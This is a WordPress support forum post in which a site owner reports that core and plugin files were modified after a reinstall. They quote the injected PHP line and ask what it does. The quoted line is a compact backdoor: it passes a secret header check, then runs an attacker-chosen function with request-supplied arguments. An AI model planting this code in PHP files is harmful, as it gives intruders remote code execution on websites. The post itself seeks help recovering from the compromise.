Files Being Modified With Following Code
-
One of my website was compromised. Since it only had like 5 pages. I saved all the pages text and completely deleted the files & database and installed everything from start. I also changed database username, pass but didn’t change addon/ftp pass.
After installing wordfence, sucuri & acunetix wp security and configuring these plugins i thought i have pretty secured my website. Site is hosted in HostGator.
But to my surprise within like 24 hours 4 of my core files where modified
Critical Problems:
* WordPress core file modified: wp-admin/edit-form-advanced.php
* WordPress core file modified: wp-includes/date.php
* WordPress core file modified: wp-includes/ms-default-filters.phpWarnings:
* Modified plugin file: wp-content/plugins/add-tags-and-category-to-page/includes/tcp_footer.phpWhen checked through wordfence showed that all file has an added line at the top of the which is:
<?php if(@md5($_SERVER[‘HTTP_PATH’])===’5cd2973f835de94b560b62465d5a37f3′){ @extract($_REQUEST); @die($stime($mtime)); } ?>
I am pretty sure this is a hack, but I am not getting how they are getting through my site when everything is up-to-date, all freely available plugins has only been installed (nothing privacy of any sort).
Also, can someone decode that code… what is it about… and how can i protect the site… i am really concerned..though i have now also changed the ftp/addon password
please help me!
The topic ‘Files Being Modified With Following Code’ is closed to new replies.